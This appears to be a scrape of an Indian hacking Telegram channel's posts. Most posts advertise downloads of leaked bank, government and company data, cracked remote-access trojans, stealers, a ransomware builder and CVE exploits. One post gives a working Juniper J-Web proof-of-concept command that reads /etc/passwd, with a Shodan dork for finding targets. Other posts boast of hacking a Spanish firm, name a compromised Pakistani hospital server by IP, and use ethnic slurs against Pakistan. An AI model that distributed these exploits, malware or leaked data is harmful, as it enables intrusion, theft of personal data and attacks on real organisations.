Date Content Media
2023-09-21 17:25:48
🇦🇿Google Dorks For Penetration Testing🇦🇿👺How is Google dorking used by hackers?:-Hacker utilize Google Dorks to uncover exposed data for example log files with usernames and passwords or cameras, etc.
2023-09-20 11:20:46
CrackCodes 🇮🇳 pinned «💩National Bank of Porkistan Data Leak : Download 🐷National Assembly of Porkistan Data Leak : Download 🐲Oschad Bank of Ukraine Data Leak : Download 🕸WAF Bypass Tool : Explore 🐀Remcos Rat 3.8.0 Cracked (Clean) : Download 👾CVE-2023-0255 Mass Exploit WordPress…»
2023-09-20 11:20:06
List of Cryptography Tools used in CTFs : Decoder 1: 2: cryptii.comDedcoder 3: 4:  crackstation.netRot Decoder: Hex:
2023-09-20 10:11:54
Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845Nearly 14,000 Juniper devices are affected, as a search on Shodan shows:Dork : title:"Juniper" http.favicon.hash:2141724739Poc:curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0'Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei: more information: #hacker_bano_chutiya_nhe
2023-09-20 08:40:24
🚀 Exciting News! Introducing NeplixFile 📂Tired of endless searches for files? NeplixFile is here to save the day! 🌟🔍 NeplixFile - Your Ultimate File Search Engine 📚🎥Say goodbye to endless searching and hello to effortless access! NeplixFile is your go-to solution for finding files like courses, ebooks, movies, and more in a snap. 🚀✨ Key Features:🔎 Lightning-fast search capabilities📚 Access to a treasure trove of resources🎉 Completely FREE!Experience the power of NeplixFile today! 🚀 Visit and simplify your file-finding journey. 🌐
2023-09-20 07:18:24
The Pakistani government has advised all sectors to avoid using AI products and services of Indian origin. The fintech sector, including some banks, in Pakistan has been collaborating with Indian-origin companies that offer IT products, cyber security, and AI solutions. Two years ago, a US company called Exodus Intelligence claimed that India had used security vulnerabilities to spy on Pakistan and China. Additionally, in 2020, Pakistani intelligence agencies discovered a significant security breach in which Indian hackers targeted the phones and devices of government officials and military personnel.
2023-09-20 02:33:09
💩National Bank of Porkistan Data Leak : Download🐷National Assembly of Porkistan Data Leak : Download🐲Oschad Bank of Ukraine Data Leak : Download🕸WAF Bypass Tool : Explore🐀Remcos Rat 3.8.0 Cracked (Clean) : Download👾CVE-2023-0255 Mass Exploit WordPress < Enable Media Plugin : Download🪬Fortinet Ssl Vpn Bruteforce : Explore@Crackcodes | |
2023-09-19 16:02:02
🧮ActMobile Networks Data Leak : Download🐲Invicta Stealer: A Powerful, Native Stealer : Download📟GoTTY – Share Your Terminal As A Web Application : Explore👾JPGtoMalware : Try💌Heart Sender V4.00.33 Crack : Download @Crackcodes | |
2023-09-19 15:00:35
"Today Bharat has reached the Moon, the G20 meeting is being held in Bharat, and Pakistan is begging countries around the world for a billion dollars"- Riyasat-e-Madina Pakistan's ex PM Nawaz Sharif.
2023-09-19 08:27:02
2023-09-19 04:45:52
𝗖𝘆𝗯𝗲𝗿𝘁𝗶𝘅, Wishing you a 𝙃𝙖𝙥𝙥𝙮 𝙂𝙖𝙣𝙚𝙨𝙝 𝘾𝙝𝙖𝙩𝙪𝙧𝙩𝙝𝙞🙏🏻✨💐🚩 Images
2023-09-18 21:33:00
Happy Ganesh Chaturthi To Everyone ❤️ Images
2023-09-18 21:05:23
🔴 USEFUL WEBSITES FOR PENTESTERS & HACKERS ➕Exploits Database 🔕 Database 🏹 Tutorials 💻 Scan 👁‍🗨 distribute to AV-- Download 🛠 Online Tools 🌐 Lookup 🔍 / Decrypt ✈️ Hash Crackers 💥 [$] [$]File Upload 🕓 Test 👺 ✅http://5deqglhxcoy3gbx6.onion - Xenobitehttp://tmkloc6vhxos3nde.onionSMS 🏴‍☠️ Identity 🔡 by 💎@TheGodEye💎
2023-09-18 16:15:41
CrackCodes 🇮🇳 pinned «🧮ActMobile Networks Data Leak : Download 🐲Invicta Stealer: A Powerful, Native Stealer : Download 📟GoTTY – Share Your Terminal As A Web Application : Explore 👾JPGtoMalware : Try 💌Heart Sender V4.00.33 Crack : Download @Crackcodes | |»
2023-09-18 12:26:38
🧮ActMobile Networks Data Leak : Download🐲Invicta Stealer: A Powerful, Native Stealer : Download📟GoTTY – Share Your Terminal As A Web Application : Explore👾JPGtoMalware : Try💌Heart Sender V4.00.33 Crack : Download @Crackcodes | |
2023-09-18 05:38:02
𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 - 𝗕𝗔𝗦𝗜𝗖𝗦𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is SQL? 𝟮. Explain Practically how SQL Works 😉𝟯. What is SQL Injection? 𝟰. Practicing Basic SQL Injection. 𝙍𝙚𝙨𝙤𝙪𝙧𝙘𝙚𝙨 𝙖𝙧𝙚 𝙖𝙙𝙙𝙚𝙙 𝙞𝙣 𝙩𝙝𝙚 𝘿𝙚𝙨𝙘𝙧𝙞𝙥𝙩𝙞𝙤𝙣, 𝙨𝙤 𝙮𝙤𝙪 𝙘𝙖𝙣 𝙖𝙘𝙘𝙚𝙨𝙨 𝙞𝙩. Please Like & Subscribe to our YouTube channel for More info about 𝗦𝗤𝗟 𝗜𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻. 🙏🏻𝗟𝗶𝗻𝗸:
2023-09-17 12:45:56
Congratulations Champions 🎉Bharat won the 8th Aisa CupJai Hind 🇮🇳 Images
2023-09-17 03:40:18
📟Xavier Marks Indonesian Data Leak : Download👾CVE-2023-34039 Exploit : Download🐲Craxs Rat V6.7 : Download🕸Invicti Standard V23.9.0.42095 Crack : Download🪅Telegram Bot For Remote Access To Computer Files : Download📯Get IP Address On Other Side Audio Call In Telegram : Download
2023-09-16 21:19:15
𝐑𝐞𝐝 𝐓𝐞𝐚𝐦 𝐓𝐨𝐨𝐥𝐬 🔥🔴 RECONNAISSANCE:- RustScan ==> NmapAutomator ==> AutoRecon ==> Amass ==> CloudEnum ==> Recon-NG ==> AttackSurfaceMapper ==> DNSDumpster ==> 🔴 INITIAL ACCESS:- SprayingToolKit ==> o365Recon ==> Psudohash ==> CredMaster ==> DomainPasswordSpray ==> TheSprayer ==> TREVORspray ==> 🔴 DELIVERY:- o365AttackToolKit ==> EvilGinx2 ==> GoPhish ==> PwnAuth ==> Modlishka ==> 🔴 COMMAND AND CONTROL:- PoshC2 ==> Sliver ==> SILENTTRINITY ==> Empire ==> AzureC2Relay ==> Havoc C2 ==> Mythic C2 ==> 🔴 CREDENTIAL DUMPING:- MimiKatz ==> HekaTomb ==> SharpLAPS ==> Net-GPPPassword ==> PyPyKatz ==> 🔴 PRIVILEGE ESCALATION:- SharpUp ==> MultiPotato ==> PEASS ==> Watson ==> Bat-Potato ==> 🔴 DEFENSE EVASION:- Villain ==> EDRSandBlast ==> SPAWN - Cobalt Strike BOF ==> NetLoader ==> KillDefenderBOF ==> ThreatCheck ==> Freeze ==> GadgetToJScript ==> 🔴 PERSISTENCE:- SharPyShell ==> SharpStay ==> SharpEventPersist ==> 🔴 LATERAL MOVEMENT:- SCShell ==> MoveKit ==> ImPacket ==> 🔴 EXFILTRATION:- SharpExfiltrate ==> DNSExfiltrator ==> Egress-Assess ==> #cybersecurity #penetrationtesting #security #ethicalhacking #tools
2023-09-16 21:15:32
𝗙𝗥𝗘𝗘 (𝗚𝗼𝗼𝗴𝗹𝗲) 𝗖𝗼𝘂𝗿𝘀𝗲𝘀 𝘆𝗼𝘂 𝘄𝗶𝗹𝗹 𝗿𝗲𝗴𝗿𝗲𝘁 𝗻𝗼𝘁 𝘁𝗮𝗸𝗶𝗻𝗴 𝗶𝗻 𝟮𝟬𝟮𝟯.1. Google Project Management🔗 Agile Project Management🔗 Project Execution: Running the Project🔗 Foundations of Project Management🔗 Project Initiation: Starting a Successful Project🔗 Project Planning: Putting It All Together🔗 Google Analytics for Power Users🔗 Fundamentals of digital marketing🔗 Python Basics for Data Analysis🔗 Data Science Foundations🔗 Advanced Google Analytics🔗 Google Cloud Computing Foundations:🔗 Data, ML, and AI in Google Cloud🔗 Machine Learning Crash Course🔗 Basics of Machine Learning🔗 Data Science with Python🔗 and support us ❤️By : @cybertrickzone
2023-09-16 21:12:42
Google is offering FREE online courses.No payment needed.Here're 10 Google courses to get certified:1. Applied Data Science with PythonBecome a Data Scientist with this awesome program.→ 6 hours to complete→ 8 Chapters→ FREE Certificate🔗 Fundamentals of Digital MarketingLearn how to use the internet to grow your business or career.→ 40 hours to complete→ Beginner friendly→ FREE Certificate🔗 Google Analytics 4 CertificationLearn how to use Google Analytics 4, the best web analytics tool, to grow your online business.→ 5 hours to complete→ Intermediate level→ Data-driven marketing→ FREE certificate🔗 Google Ads Search CertificationShow your skill in creating and optimizing Google Search campaigns that reach your goals.→ 4 hours to complete→ Intermediate level→ FREE certificate🔗 Google Ads Display CertificationLearn how to use Google Display features, optimize your campaigns, and measure your results.→ 3 hours to complete→ Beginner level→ FREE certificate🔗 YouTube Music CertificationLearn how to use YouTube Music, the best music streaming service, to grow your audience, monetize your content, and optimize your performance.→ 4 hours to complete→ Advanced level→ FREE certificate🔗 Get started with Google Maps PlatformLearn how to use Google Maps Platform to create interactive web maps and manage your projects in the Google Cloud Console.🔗 Build apps with FlutterLearn the skills to create visually appealing desktop, mobile, and web applications using Flutter, all built from a single codebase.🔗 Introduction to SQLDiscover the fundamentals of utilizing SQL for extracting and controlling data within a relational database.🔗 Generative AI [Mega Course]Learn everything you need to know about generative AI products and technologies in this comprehensive course.🔗 Learning 🌟----------------------------------------------------------------------if you found this post helpful:1️⃣ Join Telegram for more Free Coding & AI Courses, hacking courses , tech and tips
2023-09-16 18:09:56
☀️Password cracking techniques☀️There are a number of techniques that can be used to crack passwords. We will describe the most commonly used ones below;✔️Dictionary attack– This method involves the use of a wordlist to compare against user passwords.✔️Brute force attack– This method is similar to the dictionary attack. Brute force attacks use algorithms that combine alpha-numeric characters and symbols to come up with passwords for the attack. For example, a password of the value “password” can also be tried as p@$$word using the brute force attack.✔️Rainbow table attack– This method uses pre-computed hashes. Let’s assume that we have a database which stores passwords as md5 hashes. We can create another database that has md5 hashes of commonly used passwords. We can then compare the password hash we have against the stored hashes in the database. If a match is found, then we have the password.✔️Guess– As the name suggests, this method involves guessing. Passwords such as qwerty, password, admin, etc. are commonly used or set as default passwords. If they have not been changed or if the user is careless when selecting passwords, then they can be easily compromised.✔️Spidering– Most organizations use passwords that contain company information. This information can be found on company websites, social media such as facebook, twitter, etc. Spidering gathers information from these sources to come up with word lists. The word list is then used to perform dictionary and brute force attacks.
2023-09-16 17:30:19
ChatGPT Next Web : ExploreShodan Dorks 2023 : ExploreSQL Injection URL Scraper : ExploreHUMAN GENERATOR Online : ExploreHackBot - AI Cybersecurity Chatbot : ExploreCanadian Nurses Association Data Leak : ExploreXWorm V5.0 Cracked : DownloadAnti-kill PHP Trojan Generator : Explore
2023-09-16 16:13:26
A Beginner's Guide to OSINT WebinarOSINT Ambition presents you a free webinar on A Beginner's Guide to Open Source Intelligence. The webinar details are described below:Platform: Google MeetDate: September 23th, 2023Link:
2023-09-16 09:16:37
📌RCE in Juniper JunOS CVE-2023-36844-47 Exploit : Download🪅Pocket Access – Telegram Bot For Remote Access To Computer Files : Download🐸International Civil Defense Organization Data Leak : Download🤖CVE-2023-40930 POC: Skyworth 3.0 (Android) – Directory Traversal : Explore🕸Invicti Standard v23.9.0.42095 Crack : Download📯Sartrouville Company France Data Leak : Download🌚Aranui Cruises Data Leak : Download🐀Craxs Rat V6.7 : DOwnload🪬URL Infection: Exploit Silent Java Drive By Downloads Chrome : Explore🧮CVE-2023-41362 – MyBB ACP RCE Exploit : Explore 👾CVE-2023-3244 POC: WordPress Missing Authorization: Explore📍OpenText EnCase Forensic Tool : Download🐲Telegram Get remote IP: Get IP Address on Other Side Audio Call In Telegram : Check
2023-09-16 05:29:13
🚨𝗠𝗼𝘇𝗶𝗹𝗹𝗮 𝟬-𝗗𝗮𝘆 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 𝗘𝘅𝗽𝗹𝗼𝗶𝘁. 🚨Make sure you UPDATE Your Browser 👍𝗟𝗶𝗻𝗸:
2023-09-15 16:28:10 For Latest current affairs News
2023-09-15 04:55:00
𝟮𝟱𝟬+ 𝗩𝗶𝗲𝘄 😍🥳🔥𝗪𝗮𝘁𝗰𝗵 𝗡𝗼𝘄: & Support our YouTube channel for more Penetration Testing & Bug Bounty Videos 🤑
2023-09-15 01:40:01
CrackCodes 🇮🇳 pinned «📌RCE in Juniper JunOS CVE-2023-36844-47 Exploit : Download 🪅Pocket Access – Telegram Bot For Remote Access To Computer Files : Download 🐸International Civil Defense Organization Data Leak : Download 🤖CVE-2023-40930 POC: Skyworth 3.0 (Android) – Directory…»
2023-09-15 01:37:06
📌RCE in Juniper JunOS CVE-2023-36844-47 Exploit : Download🪅Pocket Access – Telegram Bot For Remote Access To Computer Files : Download🐸International Civil Defense Organization Data Leak : Download🤖CVE-2023-40930 POC: Skyworth 3.0 (Android) – Directory Traversal : Explore🕸Invicti Standard v23.9.0.42095 Crack : Download📯Sartrouville Company France Data Leak : Download🌚Aranui Cruises Data Leak : Download🐀Craxs Rat V6.7 : DOwnload🪬URL Infection: Exploit Silent Java Drive By Downloads Chrome : Explore🧮CVE-2023-41362 – MyBB ACP RCE Exploit : Explore 👾CVE-2023-3244 POC: WordPress Missing Authorization: Explore📍OpenText EnCase Forensic Tool : Download🐲Telegram Get remote IP: Get IP Address on Other Side Audio Call In Telegram : Check
2023-09-14 20:25:32
🦹‍♂🦹‍♂Web Intelligence Researching Domains🦹‍♂🦹‍♂ Web intelligence (WEBINT) is a means to efficiently identify the intelligence available in open source (OSINT). Structuring and visualizing web-based information allows an analyst to surface tactical information like technical indicators, and strategic understandings like the swaying sentiment of a troubled region. 🍎Tools Link 🍎🍏Access Check 🍏AFRINIC 🍏APNIC 🍏ARIN 🍏 Website Search Tool 🍏Better Whois 🍏Central Ops 🍏Complete DNS 🍏Daily Changes 🍏Danger Zone 🍏Da.whois 🍏Dedicated or Not 🍏Denic web whois 🍏DNSDumpster 🍏DNS History 🍏DNS Lookup 🍏DNSlytics 🍏dnspop 🍏DNS Queries 🍏dnsrecon 🍏DNS Root Instances 🍏DNSSec Analyzer🍏IMK-CREDITS 🍏DNS Spy🍏DNSStuff 🍏DNSTools 🍏DNS Trails 🍏DNS Trails 🍏dnstwist 🍏dnstwist 🍏dnstwister 🍏DNSViz 🍏Domain Big Data 🍏Domain Crawler 🍏Domain Dossier 🍏Domain Eye 🍏DomainIQ 🍏Domain SDB 🍏Domain To IP Converter 🍏Domain Tools 🍏Domain Tools 🍏DomEye 🍏downdetector 🍏downforeveryoneorjustme 🍏DNS Checker 🍏DShield API 🍏EasyCounter WHois 🍏Easy whois 🍏Educause Whois Lookup 🍏Geektools 🍏Lookup 🍏Network Tools 🍏NS.Tools Onyphe 🍏OpenData Rapid7 🍏The Prefix Whois Project 🍏PTRArchive 🍏 🍏RedirectDetective
2023-09-14 20:24:13
50 Linux commands for our day-to-day work:1. ls - List directory contents.2. pwd - Display current directory path.3. cd - Change directory.4. mkdir - Create a new directory.5. mv - Move or rename files.6. cp - Copy files.7. rm - Delete files.8. touch - Create an empty file.9. rmdir - Remove directory.10. cat - Display file content.11. clear - Clear terminal screen.12. echo - Output text or data to a file.13. less - View text files page-by-page.14. man - Display command manual.15. sudo - Execute commands with root privileges.16. top - Show system processes.17. tar - Archive files into tarball.18. grep - Search for text within files.19. head - Display file's beginning lines.20. tail - Show file's ending lines.21. diff - Compare two files' content.22. kill - Terminate processes.23. jobs - List active jobs.24. sort - Sort lines of a text file.25. df - Display disk usage.26. du - Show file or directory size.27. zip - Compress files into zip format.28. unzip - Extract zip archives.29. ssh - Secure connection between hosts.30. cal - Display calendar.31. apt - Manage packages.32. alias - Create command shortcuts.33. w - Show current user details.34. whereis - Locate binaries, sources, and manuals.35. whatis - Provide command description.36. useradd - Add a new user.37. passwd - Change user password.38. whoami - Display current user name.39. uptime - Show system runtime.40. free - Display memory status.41. history - List command history.42. uname - Provide system details.43. ping - Check network connectivity.44. chmod - Modify file/directory permissions.45. chown - Change file/directory owner.46. find - Search for files/directories.47. locate - Find files quickly.48. ifconfig - Display network interfaces.49. ip a - List network interfaces succinctly.50. finger - Retrieve user information.
2023-09-14 15:52:44
2023-09-14 15:47:43
🪅ZIPMEX Database Leak : Download📌U Mobile Malaysia Data Leak : Download👾Remcos RAT 1.7 Cracked (Cleaned) : Download🐲MTS Bank Russia 1 Million Customer Data Leak : Download💩XSS VIBES – Automatic Xss Finder : Download📯Media-Library Plugin CVE-2023-4634 Exploit : Download🪬HTMLSmuggle : Download🐀Andromeda-RAT : Download
2023-09-14 05:20:32
𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 𝗧𝗶𝗽:XSS Payloads without Parenthesis. 𝗟𝗶𝗻𝗸:
2023-09-13 21:52:08
𝐅𝐫𝐞𝐞 𝐂𝐞𝐫𝐭𝐢𝐟𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬 𝐭𝐨 𝐚𝐝𝐝 𝐭𝐨 𝐲𝐨𝐮𝐫 𝐑𝐞𝐬𝐮𝐦𝐞 𝐢𝐧 𝟐𝟎𝟐𝟑:🔸Data Science🔸React🔸Angular🔸SEO🔸Digital Marketing from Google🔸Cloud Security🔸Web Dev (HTML and CSS)🔸Python🔸JavaScript🔸DevOps🔸Machine Learning🔸Java🔸C++🔸Go🔸Neo4j Certified Professional🔸Redis Certified Developer🔸MongoDB🔸Backend Development🔸SQL
2023-09-13 14:53:39
ChatGPT Next Web : ExploreShodan Dorks 2023 : ExploreSQL Injection URL Scraper : ExploreHUMAN GENERATOR Online : ExploreHackBot - AI Cybersecurity Chatbot : ExploreCanadian Nurses Association Data Leak : ExploreXWorm V5.0 Cracked : DownloadAnti-kill PHP Trojan Generator : Explore
2023-09-13 08:59:44
30 FREE Cyber Security Certifications and Trainings.1. CCNA Security: Intro to Information Security: Networking Essentials: Cybersecurity Essentials: Network Security: NSE 1,2 & 3: Information Security: Network Security by OpenLearn: Risk Management by Open Learn: Certified in Cybersecurity℠ - CC: Introduction to Cybersecurity: Network Defense Essentials (NDE): Ethical Hacking Essentials (EHE): Digital Forensics Essentials (DFE): Dark Web, Anonymity, and Cryptocurrency: Digital Forensics by Open Learn: AWS Cloud Certifications (Cybersecurity) : Microsoft Learn for Azure: Google Cloud Training: Android Bug Bounty Hunting: Hunt Like a Rat: Vulnerability Management: Software Security: Developing Secure Software: PortSwigger Web Hacking: RedTeaming: Splunk: Secure Software Development: Maryland Software Security: Stanford Cyber Resiliency: Cyber Threat Intelligence: het MehtaBy @cybertrickzone Keep support and share ❤️
2023-09-13 05:49:55
𝟯𝟬𝟬𝟬$ 𝗕𝗼𝘂𝗻𝘁𝘆 🤑𝗕𝘂𝗴: XSS leads to Account TakeOver. 𝗩𝗶𝗱𝗲𝗼 𝗣𝗼𝗖:
2023-09-12 11:52:17
2023-09-11 09:46:52
🦚 FREE Resources to Learn & Practice Python 🦚#Python1.━━━━━━#Free_Course━━━━━━━Share nd support 🤟😉      @cybertrickzone 😘
2023-09-11 05:04:59
𝗖𝗦𝗥𝗙 𝗩𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆 😎🔥𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is CSRF? 𝟮. Workflow of CSRF? 𝟯. How & where to Find it. 𝟰. Free CSRF PoC Generator Tool 😨🔥. 𝗡𝗢𝗧𝗘: Working of CSRF PoC Tool Explained in the Video. Please Share your Views & Subscribe to our Channel you can learn New Vulnerability Topic 𝗘𝘃𝗲𝗿𝘆 𝗪𝗲𝗲𝗸 😎🙌𝗟𝗶𝗻𝗸:
2023-09-10 17:33:05
Follow our publication at Medium. https://publication.osintambition.orgJoin the OSINT Ambition community and take your investigative skills to the next level! We share expert tips, tools, and insights on OSINT.Wanted to join as a writer, read this blog. some love ❤️💕
2023-09-09 16:32:24
gg's hacker's ( I love you —❤️ ‼️Here we go again here we go again 🎉dot (aka Deepfake Offensive Toolkit) makes real-time, controllable deepfakes ready for virtual cameras injection. dot is created for performing penetration testing against e.g. identity verification. #hacker_bano_chutiya_nhe 👁
2023-09-09 15:37:49
CrackCodes 🇮🇳 pinned «🪅ZIPMEX Database Leak : Download 📌U Mobile Malaysia Data Leak : Download 👾Remcos RAT 1.7 Cracked (Cleaned) : Download 🐲MTS Bank Russia 1 Million Customer Data Leak : Download 💩XSS VIBES – Automatic Xss Finder : Download 📯Media-Library Plugin CVE-2023…»
2023-09-09 15:36:38
🪅ZIPMEX Database Leak : Download📌U Mobile Malaysia Data Leak : Download👾Remcos RAT 1.7 Cracked (Cleaned) : Download🐲MTS Bank Russia 1 Million Customer Data Leak : Download💩XSS VIBES – Automatic Xss Finder : Download📯Media-Library Plugin CVE-2023-4634 Exploit : Download🪬HTMLSmuggle : Download🐀Andromeda-RAT : Download
2023-09-09 10:26:43
WAMPSERVER : ABWA HOSPITAL & RESEARCH CENTRE pakistan: Faisalabad182.176.147.69to much fun there #hacker_bano_chutiya_nhe #pkmc_ontop
2023-09-09 04:58:07
𝟭𝟱𝟬+ 𝗩𝗶𝗲𝘄 𝗼𝗻 𝗔𝗱𝘃. 𝗧𝗼𝗽𝗶𝗰🥳𝗜𝗡𝗦𝗘𝗖𝗨𝗥𝗘 𝗗𝗘𝗦𝗘𝗥𝗜𝗔𝗟𝗜𝗭𝗔𝗧𝗜𝗢𝗡𝗪𝗮𝘁𝗰𝗵 𝗡𝗼𝘄:
2023-09-08 15:36:59
B-L-I success, I M Wapas Aa gaya
2023-09-08 11:50:26
A Beginners Guide to OSINT | Day1 of 30DaysOfOSINT me know the feedback in comments.
2023-09-08 10:18:38
Join our channel
2023-09-08 05:45:00
2023-09-08 04:53:43
𝗦𝘂𝗰𝘂𝗿𝗶 𝗫𝗦𝗦 𝗕𝘆𝗽𝗮𝘀𝘀 𝗣𝗮𝘆𝗹𝗼𝗮𝗱 🔥𝗟𝗶𝗻𝗸:
2023-09-08 00:05:51
🚫🚫New refferal events live 🚫🚫I just signed up on this awesome newsletter!Register 👇👇👇 need mail id 5 refer sticker15 refer mug 25 refer notebook50 refer cap100 refer bag500 refer mystery boxYou can get you referal link on mail tomorrow with the Newsletter on the mail at the end of the mailNote Your referal will not be updated fast you need to wait for 2 days to get your referal confirm
2023-09-07 18:05:18
𝗠𝗼𝘀𝘁 𝗔𝗱𝘃 𝗧𝗼𝗽𝗶𝗰 𝗖𝗼𝘃𝗲𝗿𝗲𝗱😨𝗕𝘂𝗴: ɪɴsᴇᴄᴜʀᴇ ᴅᴇsᴇʀɪᴀʟɪᴢᴀᴛɪᴏɴ𝗡𝗢𝗧𝗘: ‼️Watch this video Completely to understand properly‼️𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is Serializarion? 𝟮. How Deserialization works𝟯. PHP Deserialization attack𝗣𝗹𝗲𝗮𝘀𝗲 𝘀𝗵𝗮𝗿𝗲 𝘆𝗼𝘂𝗿 𝗩𝗶𝗲𝘄𝘀 𝗶𝗻 𝗖𝗼𝗺𝗺𝗲𝗻𝘁 𝗦𝗲𝗰𝘁𝗶𝗼𝗻. 𝗬𝗼𝘂𝗿 𝗙𝗲𝗲𝗱𝗯𝗮𝗰𝗸 𝗮𝗿𝗲 𝘃𝗮𝗹𝘂𝗮𝗯𝗹𝗲🙏🏻🙌🏻𝙇𝙞𝙣𝙠:
2023-09-07 15:14:11
Free courses to learn Data Science in 2023:🔸Python🔸SQL🔸R🔸PowerBI🔸Mathematics🔸🔸Excel and PowerBI🔸Probability🔸Statistics🔸Linear Algebra🔸Machine Learning🔸Deep🔸Data Analysis🔸Data Visualization #free #dataanalysis #success #datascience #2023
2023-09-07 14:18:07
🧮📌Ekohesap Information Technologies Inc Turkey Leak :📍📍NetRadar :🖨🪅Granada Energy Corporation Data Leak :📟📌Ad-Link-Bypasser-Bot : 📟🧮TBBRAT – Power Full BotNet : 🪅📍Cortex XSOAR 6.11 Enterprise : | |
2023-09-07 05:04:05
2023-09-06 13:34:22
🪅MIDHCO Data Leak :📟NtRemoteLoad – Remote Shellcode Injector :🐀TelegramRAT :🧮CVE-2023-38831 Winrar Exploit Generator :👾CVE-2023-39063 Poc :🪬JupiterX Core Premium Plugin Mass Exploit – CVE-2023-38388 :📯JDK CVE-2023-21939 POC :
2023-09-06 04:53:28
𝟭𝟬𝟬$ for ClickJacking Vulnerability on Yelp 😍🔥𝗟𝗶𝗻𝗸:
2023-09-05 20:13:44
🚫🚫New refferal events live 🚫🚫I just signed up on this awesome newsletter!Register 👇👇👇 need mail id 5 refer sticker15 refer mug 25 refer notebook50 refer cap100 refer bag500 refer mystery boxYou can get you referal link on mail tomorrow with the Newsletter on the mail at the end of the mailNote Your referal will not be updated fast you need to wait for 2 days to get your referal confirm
2023-09-04 18:30:59
📌Empower Insurance Data Leak : Download🪅Xavier Marks Indonesian Data Leak : Download📟CVE-2023-34039 Exploit Poc : Download🐲Shodan Dorks 2023 : Download📯NOVI PAZAR – PUT Data Leak : Download🕸CVE-2023-4596 Forminator WordPress Plugin Exploit : Download🪬ChatGPT Next Web : Download🐀XWorm v5.0 RAT Cracked : Download
2023-09-04 05:58:15
𝗠𝗼𝘀𝘁 𝗔𝗱𝘃 𝗧𝗼𝗽𝗶𝗰 𝗖𝗼𝘃𝗲𝗿𝗲𝗱😨𝗕𝘂𝗴: ɪɴsᴇᴄᴜʀᴇ ᴅᴇsᴇʀɪᴀʟɪᴢᴀᴛɪᴏɴ𝗡𝗢𝗧𝗘: ‼️Watch this video Completely to understand properly‼️𝗧𝗼𝗽𝗶𝗰𝘀 𝗖𝗼𝘃𝗲𝗿𝗲𝗱:𝟭. What is Serializarion? 𝟮. How Deserialization works𝟯. PHP Deserialization attack𝗣𝗹𝗲𝗮𝘀𝗲 𝘀𝗵𝗮𝗿𝗲 𝘆𝗼𝘂𝗿 𝗩𝗶𝗲𝘄𝘀 𝗶𝗻 𝗖𝗼𝗺𝗺𝗲𝗻𝘁 𝗦𝗲𝗰𝘁𝗶𝗼𝗻. 𝗬𝗼𝘂𝗿 𝗙𝗲𝗲𝗱𝗯𝗮𝗰𝗸 𝗮𝗿𝗲 𝘃𝗮𝗹𝘂𝗮𝗯𝗹𝗲🙏🏻🙌🏻𝙇𝙞𝙣𝙠:
2023-09-04 04:53:56
🕸Department of Defence South African (DARPA) Data Leak : Download🏥Canadian Nurses Association Data Leak : Download👾HackBot – AI Cybersecurity Chatbot : Download🧮CVE-2023-30943 Moodle Exploit : Download🐲CVE-2023-41717 Zscaler Proxy Exploit : Download📟B(l)utter – Flutter Mobile Application Reverse Engineering Tool : Download🪬GreenBot : Download
2023-09-04 04:43:58
We would like to bring to your attention on a recent security breach incident Between Indra Sistemas, a prominent Spanish information technology & defense systems company with Anti-Indian Nation (Pakistan) Dealing on Defence Equipment Was HACKED BY US.This incident has raised concerns about their engagement with nation (Pakistan) that support terrorism and may lack ethical standards in addressing the needs of their citizens.I just made them Feel How Close we are.....!! In picture:Simon Arnold: Account Manager Sales, Marketing, and Customer Relationship Management Deals in the High Technology and Air Traffic Management (ATM) and provides high-value and complex surveillance and communications systems to Foreign Civil Government Agencies and Defence Departments.
2023-09-03 13:41:31
👾GX40 Ransomware Builder : Download📟RogueSliver - C2 Framework : Download📯HookBot Android Malware Leak : Download🪬SQL-Login-Bypass Script : Download📍Anti-kill PHP Trojan Generator : Download🕸Nvidia Corporation Leak : Download🐲CVE-2023-35078 Exploit : Download99 Cents Only Stores Data Leak : Download
2023-09-02 18:30:43
Wish Janamdin ki Shubhkamnaye / Happy Birthday In your little Brother And My Friend >> @wenako In His DM#janamdin_ki_hardik_shubhkamnaye_wrick❤️Ishwar Gives You Happy Life
2023-09-02 11:44:13
2023-09-02 08:21:39
Aditya-L1 Mission:The launch of Aditya-L1 by PSLV-C57 is accomplished successfully.The vehicle has placed the satellite precisely into its intended orbit.India’s first solar observatory has begun its journey to the destination of Sun-Earth L1 point.Aditya-L1 started generating the power.The solar panels are deployed.The first EarthBound firing to raise the orbit is scheduled for September 3, 2023, around 11:45 Hrs.#AdityaL1
2023-09-02 06:44:51
2023-09-02 04:07:00
The #AdityaL1 satellite carrying seven indigenously developed payloads will lift off from the second launch pad of Satish Dhawan Space Centre (SDSC-Shar) at #Sriharikota on a PSLV-C57 rocket today at 11.50 am.
2023-09-02 02:08:27
CrackCodes 🇮🇳 pinned «🕸Department of Defence South African (DARPA) Data Leak : Download 🏥Canadian Nurses Association Data Leak : Download 👾HackBot – AI Cybersecurity Chatbot : Download 🧮CVE-2023-30943 Moodle Exploit : Download 🐲CVE-2023-41717 Zscaler Proxy Exploit : Download…»
2023-09-02 02:06:50
🕸Department of Defence South African (DARPA) Data Leak : Download🏥Canadian Nurses Association Data Leak : Download👾HackBot – AI Cybersecurity Chatbot : Download🧮CVE-2023-30943 Moodle Exploit : Download🐲CVE-2023-41717 Zscaler Proxy Exploit : Download📟B(l)utter – Flutter Mobile Application Reverse Engineering Tool : Download🪬GreenBot : Download
2023-09-01 19:31:56
Hello everyonePlease join our new channel for ebooks, pdfs , Handwritten notes based on topics coding, programming, cyber security etc.Link :- moto :- "Unlock the secrets of coding and fortify your digital defenses with Code And Security Vault. Dive into a treasure trove of programming wisdom, cyber security insights, and valuable resources. Join us as we safeguard the digital realm and empower developers and security enthusiasts alike."
2023-09-01 10:34:29
2023-09-01 02:39:16
